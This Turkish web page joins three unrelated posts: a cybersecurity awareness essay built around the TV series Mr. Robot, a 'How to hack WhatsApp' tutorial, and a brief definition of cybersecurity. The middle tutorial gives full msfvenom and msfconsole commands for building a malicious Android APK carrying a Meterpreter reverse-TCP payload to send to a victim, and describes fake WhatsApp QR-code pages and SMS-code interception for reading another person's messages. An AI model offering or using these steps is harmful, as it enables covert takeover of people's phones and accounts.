gördüğünüz harita siber dünyada yapılan saldırıla" /> gördüğünüz harita siber dünyada yapılan saldırıla" />
MR. ROBOT’TAN SİBER GÜVENLİK DERSLERİ

Eskiden savaşlar vardı. Şimdi siber savaşlar var.

Bu gördüğünüz harita siber dünyada yapılan saldırıları gerçek zamanlı olarak gösteriyor. Yani şu anda görünmeyen bir dünyada çok sıcak bir savaş yaşanıyor. Bugün 10 saatte 300.000’den fazla saldırı gerçekleşmiş. Bu pek de bir şey sayılmaz. Hatta siber dünya için sessiz sakin bir gün olduğunu bile söyleyebiliriz. Gün sonuna kadar 1 milyondan fazla saldırı gerçekleşmiş olacak. Milyonlarca zararlı yazılım; bilgisayarları, sistemleri ve dolayısıyla insanları tehdit edecek.

Saldıranların karşısında bir de bu saldırılara karşı tedbirler üretmeye çalışan güvenlik uzmanları var. İnternet samanlığındaki zararlı iğneleri arıyorlar. Virüsleri araştırıyorlar. Bir kısmı kendilerine “Ağaçkakan” diyor. Çünkü tıpkı onlar gibi solucan ve parazitleri avlıyorlar. Tabi ağaçlardan değil de internetten.

İşte şimdilerde üçüncü sezonu başlayan Mr. Robot dizisindeki Elliot karakteri de bu tür bir güvenlik uzmanı. En azından gündüzleri öyle. Ama geceleri bir siber aktiviste dönüşüyor. Ya da “haktivist”e.

Siber saldırıları düzenleyenler üç temel gruba ayrılır ve bunlardan ilki de bu grup. Siber eylemler yaparak politik mesajlarını söylemlerini bu yolla iletmeyi uygun görüyorlar. İkinci grup, para kazanmak daha doğrusu çalmak için saldıranlar. Yani siber hırsızlar. Genellikle kredi kartı bilgilerimizin peşindeler. Üçüncü grupsa devletlere bağlı yapılar. İstihbarat için ya da sabotaj için saldıranlar.

Bu saldırılar sanal bir ortamda gerçekleştiği için en fazla bilgisayar çöker canım ne olacak ki diye düşünmeyin. Geçtiğimiz yıl yayınlanan Zero Days adlı belgeselde bu saldırıların fiziksel cihazlara da yönelebileceği ve hatta patlamalara sebep olabileceği tezi tartışıldı.

“19.yüzyılda, ülkelerin ordularında sadece kara ve deniz kuvvetleri vardı. 20. Yüzyılda hava kuvvetleri oluştu. 21. Yüzyılda siber kuvvetler bu savaşın dördüncü boyutunu oluşturacak.” – Zero Days Belgeselinden.

Siber güvenlik son derece önemli. Az sonra bu konuda Mr. Robot dizisinden seçtiğim örneklerle kendimizi nasıl koruyabileceğimizi anlatacağım ama önce gerçek dünyadan bir örnek daha vermek istiyorum.

Geçen yıl, 21 Ekim 2016’da Amerika’da dünyanın en büyük web sitelerinden bazılarına girilemiyordu. O gün PayPal’den para transferleri yapılamadı. Netflix izlenemedi. Online oyunlar bile oynanamadı. Ve kimse bu problemi tweetleyemedi, çünkü Twitter’a da erişilemiyordu. Bir anda dünyanın en büyük 85 sitesi ortadan kayboluvermişti. Çünkü DNS sunucularına çok büyük bir DDoS saldırısı başlatılmıştı. Bu olaydan 1,5 yıl önce yayınlanan Mr. Robot’un ilk bölümünden bir sahne.

İşte dizidekine benzer bir saldırı yaşandı. Ama bu saldırının hedefi bir şirket değil, DNS sunucularıydı. Yani web sitelerinin isimlerini yazınca onları adreslerine yönlendiren sistem kilitlenmişti. Bu sistemi bir eve benzetecek olursak siz adres çubuğuna bir şey yazdığınızda bir anlamda bu evin kapısını tıklatıyorsunuz. Evin kapısı normal internet trafiğine uygun sağlamlıkta yapılmış. Ama sistemli olarak normalin dışında istekte bulunursanız, yani evin önünde bir kaç dakika içinde on milyonlarca kişi buluşup kapıyı çalmaya başlarsa ne olur? Kapı da kalmaz, ev de… İşte o gün olan da buna benzer bir şeydi.

İyi de bütün bunlardan bana ne, benim böyle bir saldırıdan haberim bile olmadı diye düşünüyor olabilirsiniz. Ama haberiniz bile olmadan bu tür saldırıların bir parçası haline gelmiş olabilirsiniz. Siz değil de kullandığınız cihazlar.

Çünkü o gün botnetlerden oluşan bir ordu saniyede 1.2 terabitlik istekleriyle sunucuları felç etmişti. Bunun için çok sayıda cihaza ihtiyaç var. Milyonlarcasına… Botnetler, zombiye dönüştürülmüş bilgisayarlar demek. Sadece bilgisayarlar değil internete bağlanabilen cihazlar da zombileştirilebilir. Ne de olsa “nesnelerin interneti” çağında yaşıyoruz. Kullandığınız bilgisayar, modem, yazıcı, cep telefonu ve daha pek çok cihaz internete bağlanabiliyor ve dolayısıyla bu tür bir saldırıda sizin haberiniz bile olmadan bir botnete dönüştürülebiliyor. Mesela kullandığınız bilgisayarın ya da cihazın şifresi ne? 123456 mı? Geçmiş olsun. Muhtemelen çoktan bir botnet ordusunun parçası haline gelmiştir.

Peki ne yapmalı? Yaşadığımız devirde artık geleneksel okur-yazarlık yeterli değil. İstesek de istemesek de dijital kültürün bir parçasıyız. Dolayısıyla dijital bir okur-yazar olmamız ve kendimizi eğitmemiz gerekiyor. Siber güvenlik de bu eğitimin en önemli derslerinden biri olmalı.

Şimdi gelin daha dikkatli bir internet kullanıcısı olmak için Mr. Robot’tan ders almaya çalışalım. Evet bir dizi karakterinden. Çünkü bu dizi siber güvenlik konusundaki en gerçekçi yapımlardan biri. Ve şimdi magazinel bir bilgi: dizinin yaratıcısı Sam Esmail’e göre bunun sebebi dizinin danışman yazarlarından biri… “Kor Adana” ismini kullanan Korhan Gürocak. Bilemiyorum belki de dizinin kadrosunda bir Türk olduğu için daha ilk bölümünde New York’taki Güllüoğlu’nda baklava yiyorlardı. Yine aynı bölümde Elliot birilerinin şifresini ele geçiriyordu. Hem de çok kolay bir şekilde.

Sizin de başınıza buna benzer bir şey gelmesin diye ilk atacağınız adım 123456 gibi şifreleri değiştirmek. İster inanın ister inanmayın hala her 100 kişiden 17’sinin şifresi bu. Daha güçlü, uzun ve özgün şifreler bulun. 123456seven da yetmez! Ve unutmayın. Şifreniz sizin sırrınız. Kimseyle paylaşmayın.

Elliot internetten de kolayca bulunabilen bir password -parola- listesi ile sırayla tüm kombinasyonları deneyerek kolaylıkla şifreleri ele geçirebiliyor. Bunun için “elpscrk” diye bir uygulama kullanıyor. Gerçekte böyle bir uygulama yok ve muhtemelen “Elliot’s Password Crack” anlamına geliyor, yani kendi yazdığı bir uygulama. Dizinin çok gerçekçi olduğunu söylemiştim değil mi?

İnternet dünyası kısmen fiziksel dünyamıza benziyor. Bu dünyanın pek çok yeri güzel olsa da uzak durmamız gereken tehlikeli, karanlık köşeleri de var. Nasıl böyle yerlere gitmekten kaçınıyorsak internette de bazı adreslere girmekten kaçınmak lazım. Girdiğiniz site size bedavaya bir şeyler vermeyi, indirmeyi vaat ediyor olabilir. Ama büyük bir ihtimalle bir yandan da sizden bir şeyler alıyordur. Siz farkına bile varmadan cihazınıza malware, spyware, adware, keylogger ve daha da kötüsü ransomware bulaştırıyordur. Bu sonuncusu bilgisayarınızı kilitleyip tekrar kullanılabilir hale gelmesi için sizden fidye istiyor.

Mr. Robot’un ikinci bölümünde ücretsiz CD dağıtan biri vardı. Bilgisayarına takınca bozukmuş gibi davrandı ama aslında oraya bir “truva atı” bıraktı. Biliyorsunuz bu bir savaş stratejisidir. Mitolojide bugünkü Çanakkale sınırları içinde yer alan tarihi Truva kentini ele geçirmek için içinde askerler olan devasa bir atı içeri sokarlar. İşte bunun yazılımsal karşılığına “remote administration tool” deniliyor. CD, DVD, USB bellek kullanarak ya da internetten bilgisayarınızın surlarının içine sokuluyor ve içinde saklı asker kodlar bilgisayarınıza uzaktan erişilmesini sağlıyor. Sonra da siz fark etmeden kamera ve mikrofon da dahil olmak üzere bilgisayarın tüm kaynakları ele geçiriliyor.

Gelelim benim favori sahneme. Burada bir Cafe’de karşılaşan iki karakterimiz var. Onlara Bay Android ve Bayan iPhone diyelim. Hangi işletim sistemi daha hızlı diye aralarında konuşurlarken böbürlenmekten ve hafif flört etmeye çalışmaktan dikkati dağılan Bay Android hız testi yapmak üzere kızın verdiği bir web sitesine girer. Ve daha sohbet bitmeden telefonun kontrolü ele geçirilir. Ha iPhone sanki daha mı güvenli? Başka bir filmden alıntıyla cevap vereyim: Hiçbir sistem güvenli değildir. (Who am I?)

Siz yine de önlem almayı ihmal etmeyin.

Online hizmetleri kullanırken eğer varsa iki adımlı doğrulama yaptırın. Dijital ayak izlerinizi takip edin. Sık kullandığınız web sitelerinin güvenilir olduğundan emin olun. Gelen kutunuzdaki mesajlarda yazan her şeye inanmayın. Kimden geldiğini bilmediğiniz e-postaların eklentilerini açmayın. Her gördüğünüz linke tıklamayın. Hele kişisel bilgilerinizi öyle her yerde paylaşmayın. Ve ne olur bilgisayarınıza ya da telefonunuza bir uygulama yüklerken çok dikkatli olun. Kapınızı çalan herkesi evinize buyur etmiyorsunuz değil mi? Aynı şey. Siber dünyadaki evinizi de işte böyle koruyun.

 

Kaynak:http://barisozcan.com/mr-robottan-siber-guvenlik-dersleri/


Whatsapp Nasıl Hacklenir ? | Whatsapp Hackleme 2019

 

İndirdiğiniz Apk Dosyaları Asla Güvenli Değil

Başlıkta görmüş olduğunuz gibi "Apk" dosyaları artık günümüzde neredeyse güvenli olmama durumuna geldi.Metasploit Termuxa(Android cep telefon linux uç birim) olarak gelmiş bulunmaktadır.Bu durumda Kali işletim sisteminden bir farkı kalmamıştır.Peki whatsapp nasıl hacklenir? sorusuna karşılık konumuzun detaylarına iniyoruz.Cep telefonunda termux ile bir zararlı apk dosyası oluşturarak, hacklemek istediğiniz kullanıcıya gönderiyoruz.Kurban bizim göndermiş olduğumuz zararlı apk dosyasını mobil cihazında açtığı takdirde MetaSploit konsol bölümünde bulunan msfconsole tarafında tarafınıza bir kapı açılır.

Peki Bu Durumda Ne Yapabiliriz?

Bugün ki yazımız'da Whatsapp nasıl hacklenir, Whatsapp hacklemek için neler yapılmalı sorularına yanıt arıyoruz.Peki Whatsapp nasıl hacklenir?

Whatsapp hacklemek için sizlere toplam bulunan 2 güzel yolu söyliyeceğim.

  1. Qr kod ile sahte bir whatsapp sayfası oluşturuyoruz ve whatsapp hacklemek istediğiniz kişinin telefonuna yapmış olduğunuz sahte whatsapp sayfasını gönderiyoruz.Eğer ki kurban karşısına çıkan qr kodu okutursa otomatik tüm mesajları size gelmiş oluyor.
  2. Sms ile hacklemek alternatif yollardan birisidir.Whatsapp bildiğiniz üzere uygulamaya girişlerde bir kod oluşturuyor.Hesab girişlerinde kullanılan bu kodu öğrenirsek otomatikman tekrar tüm mesajlara ulaşabiliyoruz.

Sizlere anlatmış olduğumuz 2 alternatif yol ile kolay bir şekilde whatsapp hackleyebilirsiniz.Fakat 2.yol kişinin cep telefonunu hackleyip smslerine müdahale eder isek hacklemek istediğiniz kişinin cep telefonunda bulunan tüm sosyal medya hesaplarınıda hackleyebilirsiniz.

Kullanacağınız Gerekli Uygulamalar;

  1. Termux
  2. Whatsapp Business

Şimdi Whatsapp Nasıl Hacklenir Sorusuna Yanıt Arayalım

İlk olarak Anroid cihanıza indirmiş olduğunuz Termux adlı uygulamayı açalım.Daha sonra aşağıda eklemiş olduğum video üzerinde anlatıldığı gibi komutları uygulayalım.

Kurulum Komutları

İlk olarak Uyguluma Ayarların/Termux/İzinler/Kayit yerine izin verelim.

  1. pkg install git curl
  2. pkg install pip pip2
  3. pkg install python python2
  4. pkg install ruby
  5. gem install bundle
  6. apt update
  7. apt upgrade
  8. pkg install vim

Detaylı Kullanım Komutları Video

Videoda kullanılan komutları aşağıda listede verdim.

  1. ./msfvenom -p android/meterpreter/reverse_tcp LHOST= ip adresinizi yazalım LPORT=4444 R > /sdcard/test.apk 
  2. İp adresinizi (ifconfig) yazarak öğrenebilirsiniz.
  3. /msfconsole
  4. use exploit/multi/handler
  5. )set payload android/meterpreter/reverse_tcp
  6. set LHOST (ip adresiniz)
  7. set LPORT 4444
  8. Exploit

Yazımızı sonlandırırken umarım faydalı olmuştur.Yapacağınız tüm işlemler kendi sorumluluğunuzdadır.

 

 

 

 


Siber Güvenlik Nedir? Güvenliğimizi Nasıl Saklarız?

Günümüzden bu güne kadar her geçilen tarihte, internet hayatımızın vazgeçilmez bir parçası olmakla beraber, peşinde gelen tehditleri'de beraberinde getirdi.Günümüzün teknolojileri hayatımızın en büyük bir kısmını etkileyen, elektronik ortamlarda yansıtmaya başlamış durumdayız.Bilgi güvenliği ve siber güvenlik çoğu zaman birbirleri yerine kullanılan ancak, birbirlerinden farklı yapılardır.Bilgi güvenliğinin ve gizliliğinin korunması olarak tanımlanır.ISO 27001,ITIL,COBIT gibi global çapta kabul görmüş standartlarla sınırlarını belirlemiştir.Bilişim sistemleri olan bilgi güvenliğini de içerisine alan çok daha geniş bir kavramdır.

Günümüzde Sanal alem, siber alem gibi isimler ile hatırladığımız bu dünya üzerinde artık, sanal ve gerçek mal varlıklarımız ile üretmiş olduğumuz veriler yaşantımız da yer alıyor.Diğer insanlarla kurduğumuz iletişimin büyük bir kısmını sanal ortamda gerçekleştiriyoruz.Bu sana yaşam tüm siber saldırılara karşı kendimizi korumak zorundayız.Yazımızın sonuna gelirken anlatmış olduğumuz bilgilerin genel tanımı "Siber Güvenlik" olarak söyleyebiliriz.

 


İlginizi Çekebilecek Yazılar